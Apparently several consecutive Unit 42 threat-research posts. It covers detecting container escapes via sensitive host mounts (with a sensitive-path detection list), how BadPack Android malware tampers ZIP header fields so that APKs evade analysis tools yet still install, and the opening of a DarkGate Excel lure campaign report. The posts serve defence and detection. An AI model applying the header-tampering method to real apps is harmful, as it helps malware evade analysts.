How to Detect Sensitive Mount Attack Techniques

We can monitor and alert on containers that mount directories with sensitive information, but this is not an active protection.
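This kind of configuration audit can be sketched as a check of each container's mount list against a set of sensitive host locations. In the Python example below, the input format of (host_source, container_target) pairs and the SENSITIVE_HOST_PATHS list are assumptions made for illustration. A real policy would be tuned to the environment.

```python
import posixpath

# Illustrative list of host locations we treat as sensitive in this sketch.
SENSITIVE_HOST_PATHS = ["/", "/etc", "/proc", "/var/log", "/var/run/docker.sock"]


def flag_sensitive_mounts(mounts, sensitive=SENSITIVE_HOST_PATHS):
    """Return the (host_source, container_target) pairs whose host side is
    a sensitive path or lies beneath one."""
    flagged = []
    for host_source, container_target in mounts:
        src = posixpath.normpath(host_source)
        for item in sensitive:
            # "/" matches only an exact root mount; otherwise every path would match.
            if src == item or (item != "/" and src.startswith(item + "/")):
                flagged.append((host_source, container_target))
                break
    return flagged


if __name__ == "__main__":
    demo = [("/etc", "/host_etc"), ("/srv/data", "/data")]
    print(flag_sensitive_mounts(demo))
```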

For effective protection against this technique, we must detect every access (read, write, create or remove) to predetermined sensitive files and locations. However, this strategy risks an influx of false positives, and it illustrates a crucial concern. We must ensure the detected file access corresponds to the correct file on the host.

For example, /etc/shadow is a sensitive file that we should protect from unauthorized access. The container runtime usually establishes a new container's root directory at a designated location in the host's file system using chroot or pivot_root to establish proper levels of access from the container. So the container’s /etc/shadow file is not the same file as the host’s /etc/shadow file, and direct monitoring of the container’s /etc/shadow will not provide us with any value in detecting the attack.

Detecting access to any file named shadow raises another challenge. A mounted file or directory may not keep its original path inside the container, so the path seen from the container gives no indication of the full host path.

The solution involves converting the path of each detected file access from its container path to its corresponding host path. This allows for monitoring based on the host path, ensuring accurate detection of attacks on sensitive files or directories that may not be directly shared between the container and the host. While the solution is straightforward in concept, its implementation could pose challenges.
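The following minimal sketch shows one way the conversion could work, assuming we already know the container's mount table and the host directory that holds its root file system. The function name, the dictionary layout and the example paths are hypothetical, and the sketch ignores symbolic links and nested mount namespaces.

```python
import posixpath

def container_to_host_path(container_path, mounts, container_root):
    """Translate a path seen inside a container into the matching host path.

    mounts: dict mapping container mount points to host source paths.
    container_root: host directory holding the container's root file system.
    """
    path = posixpath.normpath(container_path)
    # Prefer the longest matching mount point so nested mounts resolve correctly.
    for mount_point in sorted(mounts, key=len, reverse=True):
        mp = posixpath.normpath(mount_point)
        if path == mp or path.startswith(mp.rstrip("/") + "/"):
            relative = path[len(mp):].lstrip("/")
            source = mounts[mount_point]
            return posixpath.join(source, relative) if relative else source
    # No mount matched: the file lives in the container's own root file system.
    return posixpath.join(container_root, path.lstrip("/"))
```

With a mount table of {"/host_etc": "/etc"}, the container path /host_etc/passwd resolves to the host's /etc/passwd, while the container's own /etc/shadow resolves to a location under the container root and does not match the host's sensitive file.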

How can we defend against this type of container escape method? The challenge is to know which mounted files from inside the container correspond to a sensitive file on the host. Cortex XDR addresses this challenge by converting the path of relevant events and detecting file access from these sensitive mounts in real-time.

Real-World Detection of Sensitive Mount Attack Techniques

Figure 9 shows an alert for Cortex XDR blocking a container escape attempt through a sensitive mount. Cortex XDR caught an attempt to access a sensitive file on the host through a sensitive mount on a misconfigured container using the bash interface.

Image displays a cybersecurity alert diagram on a yosef-Ubuntu-20 system. The alert concerns malware named "Container-escape-Protection-Ubuntu". It highlights three stages: CGO with score 4, runc with score 1, and bash with score 4. Symbols and connecting lines between stages indicate process flow, and actions to address the alert include prevention measures, shown as blocked.
Figure 9. Cortex XDR alert data on a sensitive mount escape attempt.

Testing Environment

In our testing environment, we opted for a Kubernetes cluster using the containerd container runtime. Notably, containerd is the same container runtime employed by the Docker Engine at present.

The techniques we examined and the coverage we have incorporated in Cortex XDR are not reliant on any particular container runtime. Our approach ensures that the detections and protections are applicable across diverse container runtimes, maintaining flexibility and effectiveness in varied runtime environments.

Conclusion

In this article, we examined different container escape methods. The results highlight the growing risk of attack amid the increasing popularity of container technology. While some methods could grant an attacker partial access to the host of a container, other techniques can grant attackers full access to the host. As more organizations use containers, the risk from these escape techniques will likely remain a notable feature of our threat landscape.

To mitigate potential attacks, anyone who uses containers must be aware of the risk of these techniques and adhere to recommended security and detection guidelines.

We have incorporated robust detection logic in Cortex XDR based on the detection principles discussed in this article.

Palo Alto Networks customers receive better protection from these container escape techniques through Cortex XDR, XSIAM Linux Agent, Cortex XDR agent for Cloud and the Prisma Cloud Defender Agent for customers using the “Container Escaping” module.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Additional Resources

Updated August 6, 2024, at 9:40 a.m. PT to fix a broken link.

Beware of BadPack: One Weird Trick Being Used Against Android Devices

Executive Summary

This article discusses recent samples of BadPack Android malware and examines how this threat’s tampered headers can obstruct malware analysis. We also review the effectiveness of various freely available tools for analyzing BadPack Android Package Kit (APK) files.

The cybersecurity landscape has seen a dramatic increase in malicious Android applications in recent years. One major contributor to this trend is APK samples bundled as BadPack files.

BadPack is an APK file intentionally packaged in a malicious way. In most cases, this means an attacker has maliciously altered header information used in the compressed file format for APK files.

These tampered headers are a key feature of BadPack, and such samples typically pose a challenge for Android reverse engineering tools. Many Android-based banking Trojans like BianLian, Cerberus and TeaBot use BadPack.

Palo Alto Networks customers receive better protection from these BadPack APK samples through our Next-Generation Firewall with Cloud-Delivered Security Services, including Advanced WildFire, Advanced DNS Security and Advanced URL Filtering.

Palo Alto Networks reported these findings to Google. Based on Google’s current detection, no apps containing this malware are found on Google Play. Android users are automatically protected against known versions of this malware by Google Play Protect, which is on by default on Android devices with Google Play Services. Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Android APK

Background

APK files are applications used by the Android operating system (OS). APK applications are packages that use the ZIP archive format. These packages contain a file named AndroidManifest.xml. This is the Android Manifest that stores data and instructions for the archive's content.

AndroidManifest.xml contains valuable information about an APK-based application, especially for APK malware samples. In a BadPack APK file, attackers have tampered with its ZIP header data, attempting to prevent analysis of its content.

Analysis tools like Apktool and Jadx often struggle with extracting content from BadPack APK files. For example, we found Apktool failed to extract AndroidManifest.xml from one of the BadPack APK samples we review later in this article.

We reviewed our Advanced WildFire detection telemetry from June 2023 through June 2024 for BadPack APK files, and we discovered almost 9,200 matching samples. The graph in Figure 1 lists detections by month, illustrating BadPack trends during this time frame.

Image 1 is a column graph of the count of BadPack observed in Advanced WildFire from June 2023 to June 2024. There was a leap in May 2024.
Figure 1. BadPack observations in Advanced WildFire, June 2023 through June 2024.

The number of samples we found through Advanced WildFire indicates that BadPack APK malware is a notable threat. To combat this threat, we must better understand BadPack.

BadPack prevents normal extraction techniques, and since the most critical component of an APK archive is its Android Manifest, we should first understand the role of AndroidManifest.xml in an APK archive.

Android Manifest

The Android Manifest file AndroidManifest.xml is a crucial configuration file embedded within the APK sample. This manifest provides essential information about the mobile application to the Android device operating system.

This information includes package components to handle activities initiated by the user and services run by the application. The manifest also includes the permissions the user must grant the application for it to run correctly and the versions of Android the application runs on.

Extracting, reading and processing the Android Manifest is the first step in static analysis of an APK sample. As such, malware authors make it their goal to prevent security analysts from performing these activities. Malware authors achieve this by tampering with headers used in the ZIP archive format of the APK file.

ZIP File Structure

The ZIP format allows users to compress and archive content into a single file. The layout of a ZIP file contains two main types of headers that specify the archive's structure and content:

  • Local file headers
  • Central directory file headers

Malware authors can alter fields within these headers to prevent analysts from extracting an APK file's content, while the altered APK file can still run on an Android device.

Local File Headers

Local file headers represent the individual files contained in a ZIP archive. A ZIP archive contains at least one file, and the first bytes of a ZIP archive always start with a local file header.

If the ZIP archive contains another file, this local file header structure is repeated later in the ZIP archive. These local file headers always start with a 4-byte signature, with the first 2 bytes as the ASCII characters PK, which represent the initials of ZIP archive format creator Phillip Katz. Figure 2 shows the layout of a local file header.

Image 2 is a chart of the local header file layout.
Figure 2. Layout of the local file header structure. Source: Florian Buchholz, The structure of a PKZip file.

Figure 3 shows an example of the first bytes from a ZIP archive.

Image 3 is the hexadecimal dump of the ZIP archive.
Figure 3. Hexadecimal dump of a ZIP archive. Source: Florian Buchholz, The structure of a PKZip file.

We can map these byte values to the corresponding fields of a local file header as shown below in Figure 4.

Image 4 is an example of a local file header structure with field values added. These include the signature, version, version needed, flags, compression, mod time and more.
Figure 4. Field values populated into the local file header structure. Source: adapted from Florian Buchholz, The structure of a PKZip file.

The compression field of a local file header is located at byte offsets 0x08 and 0x09. This field can contain different values starting from 0x0000, which means the file was not compressed. In Figure 4 above, the example shows the bytes 08 00, written here as 0x0800. Read as a 2-byte little-endian integer, this is the value 8, which represents the DEFLATE compression algorithm, the most common method used for ZIP archives.

Figure 4 above shows the compressed size at byte offset 0x12 through 0x15 is 0x45, which translates to 69 bytes. The uncompressed size at byte offset 0x16 through 0x19 is 0x4a, which is 74 bytes. The compressed item's filename is 0x66696c6531, which translates to file1 in ASCII text.

In Figure 4, the file header for this ZIP archive ends at 0x37, and the content of the compressed file would begin at 0x38.
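To make the field layout concrete, here is a minimal sketch that reads the fixed 30-byte portion of a local file header with Python's struct module. The function name and the returned dictionary keys are our own choices. The sample bytes are hand-built from the values discussed above, with placeholder values for the remaining fields and no extra field, so the data offset differs from Figure 4.

```python
import struct

# Fixed 30-byte portion of a local file header; "<" selects little-endian.
LOCAL_HEADER = struct.Struct("<4sHHHHHIIIHH")

def parse_local_file_header(data, offset=0):
    """Parse one local file header from raw archive bytes."""
    (signature, version_needed, flags, method, mod_time, mod_date,
     crc32, compressed_size, uncompressed_size,
     name_len, extra_len) = LOCAL_HEADER.unpack_from(data, offset)
    if signature != b"PK\x03\x04":
        raise ValueError("no local file header signature at this offset")
    name_start = offset + LOCAL_HEADER.size
    name = data[name_start:name_start + name_len]
    return {
        "method": method,
        "compressed_size": compressed_size,
        "uncompressed_size": uncompressed_size,
        "name": name.decode("utf-8", "replace"),
        # File data begins after the file name and the optional extra field.
        "data_offset": name_start + name_len + extra_len,
    }

# Hand-built header reusing the values discussed for Figure 4. The version,
# flags, timestamps and CRC are placeholders, and no extra field is present.
sample = LOCAL_HEADER.pack(
    b"PK\x03\x04", 20, 0, 8, 0, 0, 0, 0x45, 0x4A, 5, 0) + b"file1"
header = parse_local_file_header(sample)
```

Here header["method"] is 8 (DEFLATE), and the compressed and uncompressed sizes are 69 and 74 bytes, matching the walkthrough above.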

Central Directory File Headers

The central directory contains one file header for each entry in a ZIP archive and acts as the archive's index. These headers appear after the last local file header and its file data in the archive.

In APK files, we sometimes find an optional APK Signing Block between the last local file header and the central directory header. Figure 5 shows the layout of a central directory file header.

Image 5 is an example of the layout of the central directory file header. The information includes the signature, version, flags, compression, external attributes, file name, extra field and more.
Figure 5. Layout of the central directory file header. Source: Florian Buchholz, The structure of a PKZip file.

Using the same file from Figure 3, we must scroll down to the bytes beginning at 0x09a2 to find the first central directory file header. Figure 6 below shows the content of this header.

Image 6 is an example of the central directory file header structure values in hexadecimal, displayed in columns and rows.
Figure 6. Hexadecimal dump showing a central directory file header structure values. Source: Florian Buchholz, The structure of a PKZip file.

In the example of the central directory header mapped in Figure 7, we find the same compression-related values as the local file header shown earlier in Figure 4. However, the byte offsets for these fields are different from those shown in Figure 4.

Image 7 is an example of the central directory file header structure with field values added. These include the signature, version, version needed, flags, compression, mod time and more.
Figure 7. Field values populated into the central directory file header structure. Source: adapted from Florian Buchholz, The structure of a PKZip file.

For the central directory header in Figure 7, the byte offset for the compression value is at 0x0a to 0x0b, and the value is 0x0800, representing the same DEFLATE compression algorithm we discussed immediately after Figure 4.

Figure 7 also shows the compressed size at byte offset 0x14 through 0x17 is 0x45, which translates to 69 bytes. The uncompressed size at byte offset 0x18 through 0x1b is 0x4a, which is 74 bytes. These are the same values as the local file header in Figure 4, but at different byte offsets.

The compressed item's filename is 0x66696c6531, which translates to file1 in ASCII text.

In Figure 7, the central directory header ends at 0x5b, and the content of the compressed file would begin at 0x5c.

In the ZIP archive format used by an APK file, values in the local file header and central directory file header should be consistent with each other. This means that information for a specific item within an APK file like compression method, compressed size and uncompressed size are the same in each header. We saw this when comparing the values for a compressed item named file1 in the example from Figure 4 and Figure 7.

The BadPack technique alters these values for malicious APK files, making a mismatch between the local file header and the central directory file header.
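A mismatch of this kind can be checked mechanically. The sketch below walks the central directory and compares each entry's compression method and sizes with its local file header. It is a simplified illustration under our own assumptions: the function name is hypothetical, ZIP64 archives are not handled, and the end of central directory record is located with a plain signature search.

```python
import struct

LOCAL = struct.Struct("<4sHHHHHIIIHH")          # 30-byte local file header
CENTRAL = struct.Struct("<4sHHHHHHIIIHHHHHII")  # 46-byte central directory header

def find_header_mismatches(data):
    """Map entry names to fields that differ, as (local value, central value)."""
    eocd = data.rfind(b"PK\x05\x06")  # end of central directory record
    if eocd < 0:
        raise ValueError("end of central directory record not found")
    total_entries, _cd_size, pos = struct.unpack_from("<HII", data, eocd + 10)
    mismatches = {}
    for _ in range(total_entries):
        c = CENTRAL.unpack_from(data, pos)
        if c[0] != b"PK\x01\x02":
            raise ValueError("bad central directory signature")
        name_len, extra_len, comment_len, local_offset = c[10], c[11], c[12], c[16]
        name_end = pos + CENTRAL.size + name_len
        name = data[pos + CENTRAL.size:name_end].decode("utf-8", "replace")
        loc = LOCAL.unpack_from(data, local_offset)
        pairs = {"method": (loc[3], c[4])}
        if not loc[2] & 0x08:
            # Local sizes are only meaningful when no data descriptor is used.
            pairs["compressed_size"] = (loc[7], c[8])
            pairs["uncompressed_size"] = (loc[8], c[9])
        diffs = {field: v for field, v in pairs.items() if v[0] != v[1]}
        if diffs:
            mismatches[name] = diffs
        pos = name_end + extra_len + comment_len
    return mismatches
```

An empty result means the two sets of headers agree. Any entry in the result is worth a closer look, although a mismatch alone does not prove malicious intent.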

Analyzing the BadPack Technique

In a malicious BadPack sample, the authors have tampered with the ZIP structure headers so that analysis tools fail to extract and decode AndroidManifest.xml from the APK. This causes a chain reaction of errors downstream in the static analysis pipeline. As a result, the file cannot be read and fully processed.

Malware authors can manipulate these values in any of the following ways:

  1. Specifying the correct compression method STORE, but accompanied by an invalid compressed size.
  2. Specifying any compression method value that is not DEFLATE, when the actual compression method of the payload is STORE.
  3. Specifying any compression method value in the local file header only, when the actual compression method of the payload is DEFLATE.

Android malware static analysis tools like Apktool or Jadx are generally stricter than the Android system runtime on Android devices. For these analysis tools, an APK sample must adhere to ZIP file format specifications. Therefore, Apktool and Jadx parse both the local file header and central directory file header of the ZIP structure headers in an APK file.

However, Android devices are not as strict about the official file format as these analysis tools. An APK file may contain invalid values that do not fully adhere to the official file format specification, and it may still run. This is because the Android system runtime only inspects the central directory file header. If a value from the local file header does not match, the Android runtime assumes what a correct value should actually be.

It is precisely this difference in behavior that causes analysis tools like Apktool and Jadx to fail to analyze a BadPack APK sample that installs and runs properly without issue on an Android device.

We can successfully analyze BadPack APK samples by reversing these changes to restore the original ZIP structure header values before using APK analysis tools.

Tracing the Android Codebase Implementation

We can trace back the essential implementation responsible for the difference in behavior between malware analysis tools and the Android system runtime to a section of code in the Android framework dealing with extracting content from an APK file.

In code, a method accepts input parameters and has a body of instructions that transforms those parameters into an output result returned as one or more values.

A method body is much like a recipe in cooking. When the program is executed, a function is one invocation of a method, and it receives input arguments that correspond to the input parameters defined in the method.

At runtime, invocation of this function with the string "AndroidManifest.xml" as the path argument triggers this code execution path. Figure 8 below outlines key steps of the routine (e.g., omitting error handling), simplified for readability.

Image 8 is a screenshot of the main routine for APK extraction in Android runtime. It includes three steps in total (labeled as comments).
Figure 8. Main routine in Android runtime for APK extraction. Source: The Android Open Source Project.

The logic of the code in Figure 8 consists of the following steps, with the main if-condition line highlighted:

Step 1: The central directory file header of the AndroidManifest.xml entry is retrieved. This succeeds because the header structure is still intact, although certain values have been manipulated.

Step 2: The Compression method field in this header is numerically compared to see if it equals 8 (DEFLATE). If so, the Compressed size field in this header is used to extract the payload data.

Step 3: Otherwise, the payload data is assumed to be only STORE'd, so the Uncompressed size field in this header is used for extraction instead.
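The decision in Steps 2 and 3 can be sketched in a few lines of Python. This is our own simplified model of the logic described above, not the Android source code, and the function name and parameters are hypothetical. It assumes the caller has already located the entry's payload and read the three fields from the central directory file header.

```python
import zlib

DEFLATE = 8

def extract_like_runtime(payload, method, compressed_size, uncompressed_size):
    """Model of the extraction decision described in Steps 2 and 3.

    payload: bytes starting at the entry's file data.
    method, compressed_size, uncompressed_size: values taken from the
    central directory file header of the entry.
    """
    if method == DEFLATE:
        # Step 2: inflate exactly compressed_size bytes of raw DEFLATE data.
        raw = payload[:compressed_size]
        return zlib.decompressobj(-zlib.MAX_WBITS).decompress(raw)
    # Step 3: every other method value is treated as STORE, so the
    # compressed size is ignored and uncompressed_size bytes are copied.
    return payload[:uncompressed_size]
```

Because the STORE branch never consults the compressed size or checks that the method value is valid, bogus values in those fields do not stop this model from recovering the data, while a strict parser would reject them.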

We can carry out the following two-part experiment to verify the code shown in the previous section truly handles the extracting and installing of an APK sample file onto an Android device:

Part One:

  1. Select an APK file whose "AndroidManifest.xml" payload data is actually compressed by the DEFLATE algorithm
  2. Install the APK file mentioned in Step 1 onto an Android device
  3. It will succeed with the following output message:

Part Two:

  1. Now, with the AndroidManifest.xml entry of the APK file:
    1. Go to the central directory file header
    2. Look for the Compression method field
    3. Modify its 2-byte little-endian integral value to 0 (STORE).
  2. It will now fail installation with the following output message, reporting the reason for failure as a "Corrupt XML binary file" error:

Manifestation of the BadPack Technique

Malware authors can manipulate an APK file using any of the three methods listed below. In each example, the corrected value for recovery, originally highlighted in red, follows the tampered value.

Method 1: Specify the correct compression method STORE, but accompanied by an invalid compressed size.

This breaks analysis tools processing the APK sample file, but the Android device system runtime uses the Uncompressed size field from the central directory file header when the Compression method is STORE. An example is shown below.

SHA-256 hash:
0003445778b525bcb9d86b1651af6760da7a8f54a1d001c355a5d3ad915c94cb
Local File Header - Fields

Compression method = 0 (STORE)

Compressed size = 14417 (tampered), corrected to 41192

Uncompressed size = 41192

Data = \x00\x00\x08\x00 ...

Central Directory File Header - Fields

Compression method = 0 (STORE)

Compressed size = 14417 (tampered), corrected to 41192

Uncompressed size = 41192

Method 2: Specify any compression method value that is not DEFLATE, when the actual compression method of the payload is STORE.

This breaks analysis tools processing the APK sample file, but the Android device system runtime treats the unknown compression method as STORE and reads the Uncompressed size field from the central directory file header. An example is shown below.

SHA-256 hash:
015bd2e799049f5e474b80cbbdcd592ce4e2dfbfae183bada86a9b6ec103e25e
Local File Header - Fields

Compression method = 27941 (tampered), corrected to 0 (STORE)

Compressed size = 6042 (tampered), corrected to 17264

Uncompressed size = 17264

Data = \x00\x00\x08\x00 ...

Central Directory File Header - Fields

Compression method = 38402 (tampered), corrected to 0 (STORE)

Compressed size = 6042 (tampered), corrected to 17264

Uncompressed size = 17264

Method 3: Specify any compression method value in the local file header only, when the actual compression method of the payload is DEFLATE.

This breaks analysis tools processing the APK sample file. However, the Android device system runtime only relies on the fields from the central directory file header to perform its extraction successfully. In this case, the compression method is correctly set as DEFLATE.

SHA-256 hash:
131135a7c911bd45db8801ca336fc051246280c90ae5dafc33e68499d8514761
Local File Header - Fields

Compression method = -2221 (tampered), corrected to 8 (DEFLATE)

Compressed size = 2254

Uncompressed size = 8380

Data = \xad\x58\x39\x73 ...

Central Directory File Header - Fields

Compression method = 8 (DEFLATE)

Compressed size = 2254

Uncompressed size = 8380
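The corrections in the three examples above follow one rule, which we can sketch as a small function. This is an illustrative assumption on our part rather than a complete repair tool: the function name and dictionary keys are hypothetical, it only computes corrected field values without rewriting the APK file, and it trusts the Uncompressed size in the central directory file header.

```python
def corrected_fields(local, central):
    """Return corrected (local, central) header fields for one entry.

    local, central: dicts with "method", "compressed_size" and
    "uncompressed_size" keys, as read from the two headers.
    """
    # Only a central directory value of 8 means DEFLATE; anything else is STORE.
    method = 8 if central["method"] == 8 else 0
    fixed = {
        "method": method,
        "uncompressed_size": central["uncompressed_size"],
        # A STORE'd payload occupies exactly its uncompressed size.
        "compressed_size": (central["compressed_size"] if method == 8
                            else central["uncompressed_size"]),
    }
    return dict(local, **fixed), dict(central, **fixed)

# Field values from the Method 2 example above.
local = {"method": 27941, "compressed_size": 6042, "uncompressed_size": 17264}
central = {"method": 38402, "compressed_size": 6042, "uncompressed_size": 17264}
fixed_local, fixed_central = corrected_fields(local, central)
```

For the Method 2 values, both corrected headers end up with compression method 0 (STORE) and a compressed size of 17264, which matches the corrections listed in that example.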

Android Malware Analysis Tools

This section highlights how the BadPack technique works as an anti-analysis evasion mechanism, focusing on how this manifests in file extractors and Android static analysis tools. Our example uses the APK malware sample with a SHA-256 hash of 90c41e52f5ac57b8bd056313063acadc753d44fb97c45c2dc58d4972fe9f9f21. This example uses Method 2 from the BadPack techniques listed in the previous section.

7-Zip

The file archiver 7-Zip is unable to extract the AndroidManifest.xml file from the APK sample, citing the reason for failure as a "Headers Error" as shown in Figure 9 below.

Image 9 is a screenshot of many lines of code. Highlighted in a red box is the error code where the ZIP program failed to unpack the bundled APK sample.
Figure 9. 7-Zip failed to unpack the BadPack-bundled APK sample (command output created on CodeSnap).

Apktool

Advertised as "a powerful tool designed for reverse engineering Android applications," Apktool can decompile resources, recovering them to a state as close to the original as possible. It also allows users to modify the application before rebuilding it.

The error message "Invalid CEN header (bad compression method: 19466)" in Figure 10 below suggests that the APK sample may have been compressed using some nonstandard or proprietary compression method, which Apktool does not recognize.

Image 10 is a screenshot of many lines of code. Highlighted in a red box is the code that notes the failure to decompress the APK sample.
Figure 10. Apktool failed to decompress the APK sample (command output created on CodeSnap).

Jadx

Jadx is another popular reverse engineering tool for Android applications. When attempting to load the APK malware sample into Jadx, it produces the same error message as Apktool, as depicted in Figure 11.

Image 11 is a screenshot of many lines of code. Highlighted in a red box is the line showing the error where Jadx could not process the sample.
Figure 11. Jadx was unable to process the same APK sample (command output created on CodeSnap).

This error message clearly indicates that the APK sample has an issue with its specified compression method. This arises from its author intentionally changing the compression method field value.

JAR

Strictly speaking, an APK sample belongs to the Java ARchive (JAR) file format specification because it contains the additional META-INF/MANIFEST.MF file on top of the standard ZIP file format requirements. Yet the Java Development Kit's JAR tool cannot extract the AndroidManifest.xml file. Figure 12 illustrates this.

Image 12 is a screenshot of many lines of code. Highlighted in a red box is the line showing the error where JAR could not extract the XML file. Invalid compression method.
Figure 12. Error message showing JAR cannot extract the AndroidManifest.xml file (command output created on CodeSnap).

Unzip

The error message "unsupported compression method 19466" shown in Figure 13 indicates that the Unzip tool does not support or recognize the compression method specified for the AndroidManifest.xml file. This can occur if certain files within the archive are compressed using a nonstandard or proprietary compression method. All other files in the archive extract or inflate successfully without errors.

Image 13 is a screenshot of many lines of code. Highlighted in a red box is the line showing the error where the Unzip tool could not unpack the XML file. Unsupported compression method 19466.
Figure 13. The Unzip tool cannot unpack the AndroidManifest.xml file (command output created on CodeSnap).

Apksigner

Shipped with the official Android SDK, the Apksigner tool is often used to sign APK files and verify the signature. However, it fails to verify the signature of the BadPack-bundled APK sample. Figure 14 below shows the AndroidManifest.xml file could not be read due to obfuscation.

Image 14 is a screenshot of many lines of code. Highlighted in a red box is the line showing the error where Apksigner could not read the XML file. Data of entry AndroidManifest.xml malformed.
Figure 14. Apksigner failed to read AndroidManifest.xml (command output created on CodeSnap).

apkInspector

While researching this topic, we came across an open-source tool that was able to extract the AndroidManifest.xml file.

First released on Dec. 31, 2023, apkInspector is an open-source tool that provides detailed insights into the low-level ZIP structure of raw APK files. It can also extract APK content and even decode the AndroidManifest.xml file, since the original AndroidManifest.xml file is in a binary, non-human-readable format. We executed this on our APK sample and verified it is indeed capable of both extracting and decoding the AndroidManifest.xml file.

Figure 15 below shows that apkInspector was able to extract the AndroidManifest.xml. This is due to it possessing the capability to handle tampered DEFLATE or STORE compression methods, as seen in its Python code for extraction.

Image 15 is a screenshot of many lines of code. Highlighted in a red box is the line showing where the binary XML file was successfully extracted. “Extraction successful.”
Figure 15. apkInspector extracting binary AndroidManifest.xml at 17,244 bytes (command output created on CodeSnap).

Conclusion

The increasing number of Android devices presents a growing target, which poses a significant challenge in combating malware attacks on the platform. APK files using BadPack reflect the increasing sophistication of APK malware samples. This not only presents a formidable challenge for security analysts, but it also underscores the need for continuous development of innovative techniques and tools to identify and mitigate these threats.

People should be suspicious of Android applications requiring unusual permissions not aligned with their advertised functionality, like an Android flashlight app requesting permissions to access the device's phonebook. We recommend that people also refrain from installing applications that originate from third-party sources onto their devices.

Palo Alto Networks customers receive protection from BadPack APK samples through Next-Generation Firewall with our Cloud-Delivered Security Services, including Advanced WildFire, Advanced DNS Security and Advanced URL Filtering.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks reported these findings to Google. Based on Google’s current detection, no apps containing this malware are found on Google Play. Android users are automatically protected against known versions of this malware by Google Play Protect, which is on by default on Android devices with Google Play Services. Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play.

Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

SHA256 hashes of BadPack malware samples:

  • 0003445778b525bcb9d86b1651af6760da7a8f54a1d001c355a5d3ad915c94cb
  • 015bd2e799049f5e474b80cbbdcd592ce4e2dfbfae183bada86a9b6ec103e25e
  • 131135a7c911bd45db8801ca336fc051246280c90ae5dafc33e68499d8514761
  • 90c41e52f5ac57b8bd056313063acadc753d44fb97c45c2dc58d4972fe9f9f21

Additional Resources

Updated July 16, 2024, at 6:40 a.m. PT to update Figure 4.

Updated July 17, 2024, at 6:20 a.m. PT to correct byte numbers in text.

DarkGate: Dancing the Samba With Alluring Excel Files

Executive Summary

This article reviews a DarkGate malware campaign from March-April 2024 that uses Microsoft Excel files to download a malicious software package from public-facing SMB file shares. This was a relatively short-lived campaign that illustrates how threat actors can creatively abuse legitimate tools and services to distribute their malware.

First reported in 2018, DarkGate has evolved into a malware-as-a-service (MaaS) offering. We have seen a surge of DarkGate activity after the disruption of Qakbot infrastructure in August 2023.

Palo Alto Networks customers are better protected from DarkGate and other malware families through our Next-Generation Firewall with Cloud-Delivered Security Services that include Advanced WildFire, Advanced URL Filtering and Advanced Threat Prevention. Cortex XDR can block malicious samples. The Prisma Cloud Defender Agent can detect the malware files referenced in this article using signatures generated by Advanced WildFire products and protect cloud-based VMs.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics DarkGate, Sandbox

DarkGate Background

DarkGate is a malware family first documented by enSilo in 2018. At that time, this threat ran with an advanced command and control (C2) infrastructure staffed by human operators responding to notifications of newly infected machines that had contacted its C2 server.

DarkGate has since evolved to become a MaaS offering with a tightly controlled number of customers. DarkGate has advertised various capabilities including hidden virtual network computing (hVNC), remote code execution, cryptomining and reverse shell.

An account named RastaFarEye posts updates and project information about DarkGate on the underground cybercrime market in the Exploit.IN forum and the XSS.is forum. Figure 1 below shows an October 2023 post by RastaFarEye announcing fixes and features for DarkGate version 5.

Screenshot of a forum post by user RastaFarEye titled 'UPDATE' discussing various technical updates and bug fixes related to software. The post includes file download and scanner links, and an announcement about a discount on a product subscription.
Figure 1. Exploit.IN forum post by DarkGate developer RastaFarEye in October 2023. Source: Trellix.

DarkGate remained relatively under the radar until 2021. Our telemetry revealed a surge in DarkGate starting in September 2023 (shown in Figure 2), not too long after the multinational government disruption and takedown of Qakbot infrastructure in August 2023.

Bar graph displaying data over a period with dates on the horizontal axis ranging from August 1, 2023 to March 1, 2024 and a count on the vertical axis from 0 to 15. The bars show fluctuating values, peaking around November 2023.
Figure 2. Hits on DarkGate malware samples from our telemetry.

These campaigns use AutoIt or AutoHotkey scripts to infect victims with DarkGate. Our telemetry indicates this activity has been widespread across North America and Europe as well as significant portions of Asia.

As early as January 2024, DarkGate released its sixth major version. Spamhaus reported an updated sample identified as version 6.1.6.

Since August 2023, we have seen campaigns using various methods to distribute DarkGate malware, such as the following:

Starting in March 2024, we saw a campaign using servers running open Samba file shares hosting files used for DarkGate infections. Our analysis for this article focuses on this campaign, which ran from March-April of 2024.

Analysis of March-April 2024 Campaign

In March 2024, the actors behind DarkGate began a new campaign using Microsoft Excel (.xlsx) files, which mostly targeted North America in the beginning but slowly spread to Europe as well as parts of Asia. Our telemetry indicates some peaks of activity, with the standout on April 9, 2024, with almost 2,000 samples on that single day as shown below in Figure 3.

The image displays a bar chart tracking data from March 3, 2024 to April 28, 2024. There is a spike on April 9, 2024.
Figure 3. DarkGate malware samples from our telemetry from March through April 2024.

Initially, the files all followed similar naming conventions, which was part of what made them suspicious. However, the URLs hosting them varied widely, as did the organizations accessing them.

Some popular names were:

  • paper<NUM>-<DD>-march-2024.xlsx
  • march-D<NUM>-2024.xlsx
  • ACH-<NUM>-<DD>March.xlsx
  • attach#<NUM>-<DATE>.xlsx
  • 01 CT John Doe.xlsx (where John Doe is replaceable by any common English name)
  • april2024-<NUM>.xlsx
  • statapril2024-<NUM>.xlsx

These names are designed to suggest something official/important.
